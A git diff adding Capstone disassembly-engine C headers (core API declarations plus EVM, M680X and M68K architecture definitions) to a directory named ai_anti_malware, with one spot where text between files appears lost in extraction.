macro works with position (>=1), not index +#define CS_INSN_OFFSET(insns, post) (insns[post - 1].address - insns[0].address) + + +/// All type of errors encountered by Capstone API. +/// These are values returned by cs_errno() +typedef enum cs_err { + CS_ERR_OK = 0, ///< No error: everything was fine + CS_ERR_MEM, ///< Out-Of-Memory error: cs_open(), cs_disasm(), cs_disasm_iter() + CS_ERR_ARCH, ///< Unsupported architecture: cs_open() + CS_ERR_HANDLE, ///< Invalid handle: cs_op_count(), cs_op_index() + CS_ERR_CSH, ///< Invalid csh argument: cs_close(), cs_errno(), cs_option() + CS_ERR_MODE, ///< Invalid/unsupported mode: cs_open() + CS_ERR_OPTION, ///< Invalid/unsupported option: cs_option() + CS_ERR_DETAIL, ///< Information is unavailable because detail option is OFF + CS_ERR_MEMSETUP, ///< Dynamic memory management uninitialized (see CS_OPT_MEM) + CS_ERR_VERSION, ///< Unsupported version (bindings) + CS_ERR_DIET, ///< Access irrelevant data in "diet" engine + CS_ERR_SKIPDATA, ///< Access irrelevant data for "data" instruction in SKIPDATA mode + CS_ERR_X86_ATT, ///< X86 AT&T syntax is unsupported (opt-out at compile time) + CS_ERR_X86_INTEL, ///< X86 Intel syntax is unsupported (opt-out at compile time) + CS_ERR_X86_MASM, ///< X86 Masm syntax is unsupported (opt-out at compile time) +} cs_err; + +/** + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro CS_MAKE_VERSION + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*/ +CAPSTONE_EXPORT +unsigned int CAPSTONE_API cs_version(int *major, int *minor); + + +/** + This API can be used to either ask for archs supported by this library, + or check to see if the library was compile with 'diet' option (or called + in 'diet' mode). + + To check if a particular arch is supported by this library, set @query to + arch mode (CS_ARCH_* value). + To verify if this library supports all the archs, use CS_ARCH_ALL. + + To check if this library is in 'diet' mode, set @query to CS_SUPPORT_DIET. + + @return True if this library supports the given arch, or in 'diet' mode. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_support(int query); + +/** + Initialize CS handle: this must be done before any usage of CS. + + @arch: architecture type (CS_ARCH_*) + @mode: hardware mode. This is combined of CS_MODE_* + @handle: pointer to handle, which will be updated at return time + + @return CS_ERR_OK on success, or other value on failure (refer to cs_err enum + for detailed error). +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_open(cs_arch arch, cs_mode mode, csh *handle); + +/** + Close CS handle: MUST do to release the handle when it is not used anymore. + NOTE: this must be only called when there is no longer usage of Capstone, + not even access to cs_insn array. The reason is the this API releases some + cached memory, thus access to any Capstone API after cs_close() might crash + your application. + + In fact,this API invalidate @handle by ZERO out its value (i.e *handle = 0). + + @handle: pointer to a handle returned by cs_open() + + @return CS_ERR_OK on success, or other value on failure (refer to cs_err enum + for detailed error). +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_close(csh *handle); + +/** + Set option for disassembling engine at runtime + + @handle: handle returned by cs_open() + @type: type of option to be set + @value: option value corresponding with @type + + @return: CS_ERR_OK on success, or other value on failure. + Refer to cs_err enum for detailed error. + + NOTE: in the case of CS_OPT_MEM, handle's value can be anything, + so that cs_option(handle, CS_OPT_MEM, value) can (i.e must) be called + even before cs_open() +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_option(csh handle, cs_opt_type type, size_t value); + +/** + Report the last error number when some API function fail. + Like glibc's errno, cs_errno might not retain its old value once accessed. + + @handle: handle returned by cs_open() + + @return: error code of cs_err enum type (CS_ERR_*, see above) +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_errno(csh handle); + + +/** + Return a string describing given error code. + + @code: error code (see CS_ERR_* above) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_strerror(cs_err code); + +/** + Disassemble binary code, given the code buffer, size, address and number + of instructions to be decoded. + This API dynamically allocate memory to contain disassembled instruction. + Resulting instructions will be put into @*insn + + NOTE 1: this API will automatically determine memory needed to contain + output disassembled instructions in @insn. + + NOTE 2: caller must free the allocated memory itself to avoid memory leaking. + + NOTE 3: for system with scarce memory to be dynamically allocated such as + OS kernel or firmware, the API cs_disasm_iter() might be a better choice than + cs_disasm(). The reason is that with cs_disasm(), based on limited available + memory, we have to calculate in advance how many instructions to be disassembled, + which complicates things. This is especially troublesome for the case @count=0, + when cs_disasm() runs uncontrollably (until either end of input buffer, or + when it encounters an invalid instruction). + + @handle: handle returned by cs_open() + @code: buffer containing raw binary code to be disassembled. + @code_size: size of the above code buffer. + @address: address of the first instruction in given raw code buffer. + @insn: array of instructions filled in by this API. + NOTE: @insn will be allocated by this function, and should be freed + with cs_free() API. + @count: number of instructions to be disassembled, or 0 to get all of them + + @return: the number of successfully disassembled instructions, + or 0 if this function failed to disassemble the given code + + On failure, call cs_errno() for error code. +*/ +CAPSTONE_EXPORT +size_t CAPSTONE_API cs_disasm(csh handle, + const uint8_t *code, size_t code_size, + uint64_t address, + size_t count, + cs_insn **insn); + +/** + Deprecated function - to be retired in the next version! + Use cs_disasm() instead of cs_disasm_ex() +*/ +CAPSTONE_EXPORT +CAPSTONE_DEPRECATED +size_t CAPSTONE_API cs_disasm_ex(csh handle, + const uint8_t *code, size_t code_size, + uint64_t address, + size_t count, + cs_insn **insn); + +/** + Free memory allocated by cs_malloc() or cs_disasm() (argument @insn) + + @insn: pointer returned by @insn argument in cs_disasm() or cs_malloc() + @count: number of cs_insn structures returned by cs_disasm(), or 1 + to free memory allocated by cs_malloc(). +*/ +CAPSTONE_EXPORT +void CAPSTONE_API cs_free(cs_insn *insn, size_t count); + + +/** + Allocate memory for 1 instruction to be used by cs_disasm_iter(). + + @handle: handle returned by cs_open() + + NOTE: when no longer in use, you can reclaim the memory allocated for + this instruction with cs_free(insn, 1) +*/ +CAPSTONE_EXPORT +cs_insn * CAPSTONE_API cs_malloc(csh handle); + +/** + Fast API to disassemble binary code, given the code buffer, size, address + and number of instructions to be decoded. + This API puts the resulting instruction into a given cache in @insn. + See tests/test_iter.c for sample code demonstrating this API. + + NOTE 1: this API will update @code, @size & @address to point to the next + instruction in the input buffer. Therefore, it is convenient to use + cs_disasm_iter() inside a loop to quickly iterate all the instructions. + While decoding one instruction at a time can also be achieved with + cs_disasm(count=1), some benchmarks shown that cs_disasm_iter() can be 30% + faster on random input. + + NOTE 2: the cache in @insn can be created with cs_malloc() API. + + NOTE 3: for system with scarce memory to be dynamically allocated such as + OS kernel or firmware, this API is recommended over cs_disasm(), which + allocates memory based on the number of instructions to be disassembled. + The reason is that with cs_disasm(), based on limited available memory, + we have to calculate in advance how many instructions to be disassembled, + which complicates things. This is especially troublesome for the case + @count=0, when cs_disasm() runs uncontrollably (until either end of input + buffer, or when it encounters an invalid instruction). + + @handle: handle returned by cs_open() + @code: buffer containing raw binary code to be disassembled + @size: size of above code + @address: address of the first insn in given raw code buffer + @insn: pointer to instruction to be filled in by this API. + + @return: true if this API successfully decode 1 instruction, + or false otherwise. + + On failure, call cs_errno() for error code. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_disasm_iter(csh handle, + const uint8_t **code, size_t *size, + uint64_t *address, cs_insn *insn); + +/** + Return friendly name of register in a string. + Find the instruction id from header file of corresponding architecture (arm.h for ARM, + x86.h for X86, ...) + + WARN: when in 'diet' mode, this API is irrelevant because engine does not + store register name. + + @handle: handle returned by cs_open() + @reg_id: register id + + @return: string name of the register, or NULL if @reg_id is invalid. +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_reg_name(csh handle, unsigned int reg_id); + +/** + Return friendly name of an instruction in a string. + Find the instruction id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + store instruction name. + + @handle: handle returned by cs_open() + @insn_id: instruction id + + @return: string name of the instruction, or NULL if @insn_id is invalid. +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_insn_name(csh handle, unsigned int insn_id); + +/** + Return friendly name of a group id (that an instruction can belong to) + Find the group id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + store group name. + + @handle: handle returned by cs_open() + @group_id: group id + + @return: string name of the group, or NULL if @group_id is invalid. +*/ +CAPSTONE_EXPORT +const char * CAPSTONE_API cs_group_name(csh handle, unsigned int group_id); + +/** + Check if a disassembled instruction belong to a particular group. + Find the group id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + Internally, this simply verifies if @group_id matches any member of insn->groups array. + + NOTE: this API is only valid when detail option is ON (which is OFF by default). + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + update @groups array. + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @group_id: group that you want to check if this instruction belong to. + + @return: true if this instruction indeed belongs to the given group, or false otherwise. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_insn_group(csh handle, const cs_insn *insn, unsigned int group_id); + +/** + Check if a disassembled instruction IMPLICITLY used a particular register. + Find the register id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + Internally, this simply verifies if @reg_id matches any member of insn->regs_read array. + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + update @regs_read array. + + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @reg_id: register that you want to check if this instruction used it. + + @return: true if this instruction indeed implicitly used the given register, or false otherwise. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_reg_read(csh handle, const cs_insn *insn, unsigned int reg_id); + +/** + Check if a disassembled instruction IMPLICITLY modified a particular register. + Find the register id from header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + Internally, this simply verifies if @reg_id matches any member of insn->regs_write array. + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + WARN: when in 'diet' mode, this API is irrelevant because the engine does not + update @regs_write array. + + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @reg_id: register that you want to check if this instruction modified it. + + @return: true if this instruction indeed implicitly modified the given register, or false otherwise. +*/ +CAPSTONE_EXPORT +bool CAPSTONE_API cs_reg_write(csh handle, const cs_insn *insn, unsigned int reg_id); + +/** + Count the number of operands of a given type. + Find the operand type in header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @op_type: Operand type to be found. + + @return: number of operands of given type @op_type in instruction @insn, + or -1 on failure. +*/ +CAPSTONE_EXPORT +int CAPSTONE_API cs_op_count(csh handle, const cs_insn *insn, unsigned int op_type); + +/** + Retrieve the position of operand of given type in .operands[] array. + Later, the operand can be accessed using the returned position. + Find the operand type in header file of corresponding architecture (arm.h for ARM, x86.h for X86, ...) + + NOTE: this API is only valid when detail option is ON (which is OFF by default) + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure received from cs_disasm() or cs_disasm_iter() + @op_type: Operand type to be found. + @position: position of the operand to be found. This must be in the range + [1, cs_op_count(handle, insn, op_type)] + + @return: index of operand of given type @op_type in .operands[] array + in instruction @insn, or -1 on failure. +*/ +CAPSTONE_EXPORT +int CAPSTONE_API cs_op_index(csh handle, const cs_insn *insn, unsigned int op_type, + unsigned int position); + +/// Type of array to keep the list of registers +typedef uint16_t cs_regs[64]; + +/** + Retrieve all the registers accessed by an instruction, either explicitly or + implicitly. + + WARN: when in 'diet' mode, this API is irrelevant because engine does not + store registers. + + @handle: handle returned by cs_open() + @insn: disassembled instruction structure returned from cs_disasm() or cs_disasm_iter() + @regs_read: on return, this array contains all registers read by instruction. + @regs_read_count: number of registers kept inside @regs_read array. + @regs_write: on return, this array contains all registers written by instruction. + @regs_write_count: number of registers kept inside @regs_write array. + + @return CS_ERR_OK on success, or other value on failure (refer to cs_err enum + for detailed error). +*/ +CAPSTONE_EXPORT +cs_err CAPSTONE_API cs_regs_access(csh handle, const cs_insn *insn, + cs_regs regs_read, uint8_t *regs_read_count, + cs_regs regs_write, uint8_t *regs_write_count); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/evm.h b/ai_anti_malware/capstone/include/capstone/evm.h new file mode 100644 index 0000000..78fb7c0 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/evm.h @@ -0,0 +1,188 @@ +#ifndef CAPSTONE_EVM_H +#define CAPSTONE_EVM_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2018 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Instruction structure +typedef struct cs_evm { + unsigned char pop; ///< number of items popped from the stack + unsigned char push; ///< number of items pushed into the stack + unsigned int fee; ///< gas fee for the instruction +} cs_evm; + +/// EVM instruction +typedef enum evm_insn { + EVM_INS_STOP = 0, + EVM_INS_ADD = 1, + EVM_INS_MUL = 2, + EVM_INS_SUB = 3, + EVM_INS_DIV = 4, + EVM_INS_SDIV = 5, + EVM_INS_MOD = 6, + EVM_INS_SMOD = 7, + EVM_INS_ADDMOD = 8, + EVM_INS_MULMOD = 9, + EVM_INS_EXP = 10, + EVM_INS_SIGNEXTEND = 11, + EVM_INS_LT = 16, + EVM_INS_GT = 17, + EVM_INS_SLT = 18, + EVM_INS_SGT = 19, + EVM_INS_EQ = 20, + EVM_INS_ISZERO = 21, + EVM_INS_AND = 22, + EVM_INS_OR = 23, + EVM_INS_XOR = 24, + EVM_INS_NOT = 25, + EVM_INS_BYTE = 26, + EVM_INS_SHA3 = 32, + EVM_INS_ADDRESS = 48, + EVM_INS_BALANCE = 49, + EVM_INS_ORIGIN = 50, + EVM_INS_CALLER = 51, + EVM_INS_CALLVALUE = 52, + EVM_INS_CALLDATALOAD = 53, + EVM_INS_CALLDATASIZE = 54, + EVM_INS_CALLDATACOPY = 55, + EVM_INS_CODESIZE = 56, + EVM_INS_CODECOPY = 57, + EVM_INS_GASPRICE = 58, + EVM_INS_EXTCODESIZE = 59, + EVM_INS_EXTCODECOPY = 60, + EVM_INS_RETURNDATASIZE = 61, + EVM_INS_RETURNDATACOPY = 62, + EVM_INS_BLOCKHASH = 64, + EVM_INS_COINBASE = 65, + EVM_INS_TIMESTAMP = 66, + EVM_INS_NUMBER = 67, + EVM_INS_DIFFICULTY = 68, + EVM_INS_GASLIMIT = 69, + EVM_INS_POP = 80, + EVM_INS_MLOAD = 81, + EVM_INS_MSTORE = 82, + EVM_INS_MSTORE8 = 83, + EVM_INS_SLOAD = 84, + EVM_INS_SSTORE = 85, + EVM_INS_JUMP = 86, + EVM_INS_JUMPI = 87, + EVM_INS_PC = 88, + EVM_INS_MSIZE = 89, + EVM_INS_GAS = 90, + EVM_INS_JUMPDEST = 91, + EVM_INS_PUSH1 = 96, + EVM_INS_PUSH2 = 97, + EVM_INS_PUSH3 = 98, + EVM_INS_PUSH4 = 99, + EVM_INS_PUSH5 = 100, + EVM_INS_PUSH6 = 101, + EVM_INS_PUSH7 = 102, + EVM_INS_PUSH8 = 103, + EVM_INS_PUSH9 = 104, + EVM_INS_PUSH10 = 105, + EVM_INS_PUSH11 = 106, + EVM_INS_PUSH12 = 107, + EVM_INS_PUSH13 = 108, + EVM_INS_PUSH14 = 109, + EVM_INS_PUSH15 = 110, + EVM_INS_PUSH16 = 111, + EVM_INS_PUSH17 = 112, + EVM_INS_PUSH18 = 113, + EVM_INS_PUSH19 = 114, + EVM_INS_PUSH20 = 115, + EVM_INS_PUSH21 = 116, + EVM_INS_PUSH22 = 117, + EVM_INS_PUSH23 = 118, + EVM_INS_PUSH24 = 119, + EVM_INS_PUSH25 = 120, + EVM_INS_PUSH26 = 121, + EVM_INS_PUSH27 = 122, + EVM_INS_PUSH28 = 123, + EVM_INS_PUSH29 = 124, + EVM_INS_PUSH30 = 125, + EVM_INS_PUSH31 = 126, + EVM_INS_PUSH32 = 127, + EVM_INS_DUP1 = 128, + EVM_INS_DUP2 = 129, + EVM_INS_DUP3 = 130, + EVM_INS_DUP4 = 131, + EVM_INS_DUP5 = 132, + EVM_INS_DUP6 = 133, + EVM_INS_DUP7 = 134, + EVM_INS_DUP8 = 135, + EVM_INS_DUP9 = 136, + EVM_INS_DUP10 = 137, + EVM_INS_DUP11 = 138, + EVM_INS_DUP12 = 139, + EVM_INS_DUP13 = 140, + EVM_INS_DUP14 = 141, + EVM_INS_DUP15 = 142, + EVM_INS_DUP16 = 143, + EVM_INS_SWAP1 = 144, + EVM_INS_SWAP2 = 145, + EVM_INS_SWAP3 = 146, + EVM_INS_SWAP4 = 147, + EVM_INS_SWAP5 = 148, + EVM_INS_SWAP6 = 149, + EVM_INS_SWAP7 = 150, + EVM_INS_SWAP8 = 151, + EVM_INS_SWAP9 = 152, + EVM_INS_SWAP10 = 153, + EVM_INS_SWAP11 = 154, + EVM_INS_SWAP12 = 155, + EVM_INS_SWAP13 = 156, + EVM_INS_SWAP14 = 157, + EVM_INS_SWAP15 = 158, + EVM_INS_SWAP16 = 159, + EVM_INS_LOG0 = 160, + EVM_INS_LOG1 = 161, + EVM_INS_LOG2 = 162, + EVM_INS_LOG3 = 163, + EVM_INS_LOG4 = 164, + EVM_INS_CREATE = 240, + EVM_INS_CALL = 241, + EVM_INS_CALLCODE = 242, + EVM_INS_RETURN = 243, + EVM_INS_DELEGATECALL = 244, + EVM_INS_CALLBLACKBOX = 245, + EVM_INS_STATICCALL = 250, + EVM_INS_REVERT = 253, + EVM_INS_SUICIDE = 255, + + EVM_INS_INVALID = 512, + EVM_INS_ENDING, // <-- mark the end of the list of instructions +} evm_insn; + +/// Group of EVM instructions +typedef enum evm_insn_group { + EVM_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + EVM_GRP_JUMP, ///< all jump instructions + + EVM_GRP_MATH = 8, ///< math instructions + EVM_GRP_STACK_WRITE, ///< instructions write to stack + EVM_GRP_STACK_READ, ///< instructions read from stack + EVM_GRP_MEM_WRITE, ///< instructions write to memory + EVM_GRP_MEM_READ, ///< instructions read from memory + EVM_GRP_STORE_WRITE, ///< instructions write to storage + EVM_GRP_STORE_READ, ///< instructions read from storage + EVM_GRP_HALT, ///< instructions halt execution + + EVM_GRP_ENDING, ///< <-- mark the end of the list of groups +} evm_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/m680x.h b/ai_anti_malware/capstone/include/capstone/m680x.h new file mode 100644 index 0000000..c8296e4 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/m680x.h @@ -0,0 +1,537 @@ +#ifndef CAPSTONE_M680X_H +#define CAPSTONE_M680X_H + +/* Capstone Disassembly Engine */ +/* M680X Backend by Wolfgang Schwotzer 2017 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +#define M680X_OPERAND_COUNT 9 + +/// M680X registers and special registers +typedef enum m680x_reg { + M680X_REG_INVALID = 0, + + M680X_REG_A, ///< M6800/1/2/3/9, HD6301/9 + M680X_REG_B, ///< M6800/1/2/3/9, HD6301/9 + M680X_REG_E, ///< HD6309 + M680X_REG_F, ///< HD6309 + M680X_REG_0, ///< HD6309 + + M680X_REG_D, ///< M6801/3/9, HD6301/9 + M680X_REG_W, ///< HD6309 + + M680X_REG_CC, ///< M6800/1/2/3/9, M6301/9 + M680X_REG_DP, ///< M6809/M6309 + M680X_REG_MD, ///< M6309 + + M680X_REG_HX, ///< M6808 + M680X_REG_H, ///< M6808 + M680X_REG_X, ///< M6800/1/2/3/9, M6301/9 + M680X_REG_Y, ///< M6809/M6309 + M680X_REG_S, ///< M6809/M6309 + M680X_REG_U, ///< M6809/M6309 + M680X_REG_V, ///< M6309 + + M680X_REG_Q, ///< M6309 + + M680X_REG_PC, ///< M6800/1/2/3/9, M6301/9 + + M680X_REG_TMP2, ///< CPU12 + M680X_REG_TMP3, ///< CPU12 + + M680X_REG_ENDING, ///< <-- mark the end of the list of registers +} m680x_reg; + +/// Operand type for instruction's operands +typedef enum m680x_op_type { + M680X_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + M680X_OP_REGISTER, ///< = Register operand. + M680X_OP_IMMEDIATE, ///< = Immediate operand. + M680X_OP_INDEXED, ///< = Indexed addressing operand. + M680X_OP_EXTENDED, ///< = Extended addressing operand. + M680X_OP_DIRECT, ///< = Direct addressing operand. + M680X_OP_RELATIVE, ///< = Relative addressing operand. + M680X_OP_CONSTANT, ///< = constant operand (Displayed as number only). + ///< Used e.g. for a bit index or page number. +} m680x_op_type; + +// Supported bit values for mem.idx.offset_bits +#define M680X_OFFSET_NONE 0 +#define M680X_OFFSET_BITS_5 5 +#define M680X_OFFSET_BITS_8 8 +#define M680X_OFFSET_BITS_9 9 +#define M680X_OFFSET_BITS_16 16 + +// Supported bit flags for mem.idx.flags +// These flags can be combined +#define M680X_IDX_INDIRECT 1 +#define M680X_IDX_NO_COMMA 2 +#define M680X_IDX_POST_INC_DEC 4 + +/// Instruction's operand referring to indexed addressing +typedef struct m680x_op_idx { + m680x_reg base_reg; ///< base register (or M680X_REG_INVALID if + ///< irrelevant) + m680x_reg offset_reg; ///< offset register (or M680X_REG_INVALID if + ///< irrelevant) + int16_t offset; ///< 5-,8- or 16-bit offset. See also offset_bits. + uint16_t offset_addr; ///< = offset addr. if base_reg == M680X_REG_PC. + ///< calculated as offset + PC + uint8_t offset_bits; ///< offset width in bits for indexed addressing + int8_t inc_dec; ///< inc. or dec. value: + ///< 0: no inc-/decrement + ///< 1 .. 8: increment by 1 .. 8 + ///< -1 .. -8: decrement by 1 .. 8 + ///< if flag M680X_IDX_POST_INC_DEC set it is post + ///< inc-/decrement otherwise pre inc-/decrement + uint8_t flags; ///< 8-bit flags (see above) +} m680x_op_idx; + +/// Instruction's memory operand referring to relative addressing (Bcc/LBcc) +typedef struct m680x_op_rel { + uint16_t address; ///< The absolute address. + ///< calculated as PC + offset. PC is the first + ///< address after the instruction. + int16_t offset; ///< the offset/displacement value +} m680x_op_rel; + +/// Instruction's operand referring to extended addressing +typedef struct m680x_op_ext { + uint16_t address; ///< The absolute address + bool indirect; ///< true if extended indirect addressing +} m680x_op_ext; + +/// Instruction operand +typedef struct cs_m680x_op { + m680x_op_type type; + union { + int32_t imm; ///< immediate value for IMM operand + m680x_reg reg; ///< register value for REG operand + m680x_op_idx idx; ///< Indexed addressing operand + m680x_op_rel rel; ///< Relative address. operand (Bcc/LBcc) + m680x_op_ext ext; ///< Extended address + uint8_t direct_addr; ///<, 2015-2016 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +#define M68K_OPERAND_COUNT 4 + +/// M68K registers and special registers +typedef enum m68k_reg { + M68K_REG_INVALID = 0, + + M68K_REG_D0, + M68K_REG_D1, + M68K_REG_D2, + M68K_REG_D3, + M68K_REG_D4, + M68K_REG_D5, + M68K_REG_D6, + M68K_REG_D7, + + M68K_REG_A0, + M68K_REG_A1, + M68K_REG_A2, + M68K_REG_A3, + M68K_REG_A4, + M68K_REG_A5, + M68K_REG_A6, + M68K_REG_A7, + + M68K_REG_FP0, + M68K_REG_FP1, + M68K_REG_FP2, + M68K_REG_FP3, + M68K_REG_FP4, + M68K_REG_FP5, + M68K_REG_FP6, + M68K_REG_FP7, + + M68K_REG_PC, + + M68K_REG_SR, + M68K_REG_CCR, + M68K_REG_SFC, + M68K_REG_DFC, + M68K_REG_USP, + M68K_REG_VBR, + M68K_REG_CACR, + M68K_REG_CAAR, + M68K_REG_MSP, + M68K_REG_ISP, + M68K_REG_TC, + M68K_REG_ITT0, + M68K_REG_ITT1, + M68K_REG_DTT0, + M68K_REG_DTT1, + M68K_REG_MMUSR, + M68K_REG_URP, + M68K_REG_SRP, + + M68K_REG_FPCR, + M68K_REG_FPSR, + M68K_REG_FPIAR, + + M68K_REG_ENDING, // <-- mark the end of the list of registers +} m68k_reg; + +/// M68K Addressing Modes +typedef enum m68k_address_mode { + M68K_AM_NONE = 0, ///< No address mode. + + M68K_AM_REG_DIRECT_DATA, ///< Register Direct - Data + M68K_AM_REG_DIRECT_ADDR, ///< Register Direct - Address + + M68K_AM_REGI_ADDR, ///< Register Indirect - Address + M68K_AM_REGI_ADDR_POST_INC, ///< Register Indirect - Address with Postincrement + M68K_AM_REGI_ADDR_PRE_DEC, ///< Register Indirect - Address with Predecrement + M68K_AM_REGI_ADDR_DISP, ///< Register Indirect - Address with Displacement + + M68K_AM_AREGI_INDEX_8_BIT_DISP, ///< Address Register Indirect With Index- 8-bit displacement + M68K_AM_AREGI_INDEX_BASE_DISP, ///< Address Register Indirect With Index- Base displacement + + M68K_AM_MEMI_POST_INDEX, ///< Memory indirect - Postindex + M68K_AM_MEMI_PRE_INDEX, ///< Memory indirect - Preindex + + M68K_AM_PCI_DISP, ///< Program Counter Indirect - with Displacement + + M68K_AM_PCI_INDEX_8_BIT_DISP, ///< Program Counter Indirect with Index - with 8-Bit Displacement + M68K_AM_PCI_INDEX_BASE_DISP, ///< Program Counter Indirect with Index - with Base Displacement + + M68K_AM_PC_MEMI_POST_INDEX, ///< Program Counter Memory Indirect - Postindexed + M68K_AM_PC_MEMI_PRE_INDEX, ///< Program Counter Memory Indirect - Preindexed + + M68K_AM_ABSOLUTE_DATA_SHORT, ///< Absolute Data Addressing - Short + M68K_AM_ABSOLUTE_DATA_LONG, ///< Absolute Data Addressing - Long + M68K_AM_IMMEDIATE, ///< Immediate value + + M68K_AM_BRANCH_DISPLACEMENT, ///< Address as displacement from (PC+2) used by branches +} m68k_address_mode; + +/// Operand type for instruction's operands +typedef enum m68k_op_type { + M68K_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + M68K_OP_REG, ///< = CS_OP_REG (Register operand). + M68K_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + M68K_OP_MEM, ///< = CS_OP_MEM (Memory operand). + M68K_OP_FP_SINGLE, ///< single precision Floating-Point operand + M68K_OP_FP_DOUBLE, ///< double precision Floating-Point operand + M68K_OP_REG_BITS, ///< Register bits move + M68K_OP_REG_PAIR, ///< Register pair in the same op (upper 4 bits for first reg, lower for second) + M68K_OP_BR_DISP, ///< Branch displacement +} m68k_op_type; + +/// Instruction's operand referring to memory +/// This is associated with M68K_OP_MEM operand type above +typedef struct m68k_op_mem { + m68k_reg base_reg; ///< base register (or M68K_REG_INVALID if irrelevant) + m68k_reg index_reg; ///< index register (or M68K_REG_INVALID if irrelevant) + m68k_reg in_base_reg; ///< indirect base register (or M68K_REG_INVALID if irrelevant) + uint32_t in_disp; ///< indirect displacement + uint32_t out_disp; ///< other displacement + int16_t disp; ///< displacement value + uint8_t scale; ///< scale for index register + uint8_t bitfield; ///< set to true if the two values below should be used + uint8_t width; ///< used for bf* instructions + uint8_t offset; ///< used for bf* instructions + uint8_t index_size; ///< 0 = w, 1 = l +} m68k_op_mem; + +/// Operand type for instruction's operands +typedef enum m68k_op_br_disp_size { + M68K_OP_BR_DISP_SIZE_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + M68K_OP_BR_DISP_SIZE_BYTE = 1, ///< signed 8-bit displacement + M68K_OP_BR_DISP_SIZE_WORD = 2, ///< signed 16-bit displacement + M68K_OP_BR_DISP_SIZE_LONG = 4, ///< signed 32-bit displacement +} m68k_op_br_disp_size; + +typedef struct m68k_op_br_disp { + int32_t disp; ///< displacement value + uint8_t disp_size; ///< Size from m68k_op_br_disp_size type above +} m68k_op_br_disp; + +/// Register pair in one operand. +typedef struct cs_m68k_op_reg_pair { + m68k_reg reg_0; + m68k_reg reg_1; +} cs_m68k_op_reg_pair; + +/// Instruction operand +typedef struct cs_m68k_op { + union { + uint64_t imm; ///< immediate value for IMM operand + double dimm; ///< double imm + float simm; ///< float imm + m68k_reg reg; ///< register value for REG operand + cs_m68k_op_reg_pair reg_pair; ///< register pair in one operand + }; + + m68k_op_mem mem; ///< data when operand is targeting memory + m68k_op_br_disp br_disp; ///< data when operand is a branch displacement + uint32_t register_bits; ///< register bits for movem etc. (always in d0-d7, a0-a7, fp0 - fp7 order) + m68k_op_type type; + m68k_address_mode address_mode; ///< M68K addressing mode for this op +} cs_m68k_op; + +/// Operation size of the CPU instructions +typedef enum m68k_cpu_size { + M68K_CPU_SIZE_NONE = 0, ///< unsized or unspecified + M68K_CPU_SIZE_BYTE = 1, ///< 1 byte in size + M68K_CPU_SIZE_WORD = 2, ///< 2 bytes in size + M68K_CPU_SIZE_LONG = 4, ///< 4 bytes in size +} m68k_cpu_size; + +/// Operation size of the FPU instructions (Notice that FPU instruction can also use CPU sizes if needed) +typedef enum m68k_fpu_size { + M68K_FPU_SIZE_NONE = 0, ///< unsized like fsave/frestore + M68K_FPU_SIZE_SINGLE = 4, ///< 4 byte in size (single float) + M68K_FPU_SIZE_DOUBLE = 8, ///< 8 byte in size (double) + M68K_FPU_SIZE_EXTENDED = 12, ///< 12 byte in size (extended real format) +} m68k_fpu_size; + +/// Type of size that is being used for the current instruction +typedef enum m68k_size_type { + M68K_SIZE_TYPE_INVALID = 0, + + M68K_SIZE_TYPE_CPU, + M68K_SIZE_TYPE_FPU, +} m68k_size_type; + +/// Operation size of the current instruction (NOT the actually size of instruction) +typedef struct m68k_op_size { + m68k_size_type type; + union { + m68k_cpu_size cpu_size; + m68k_fpu_size fpu_size; 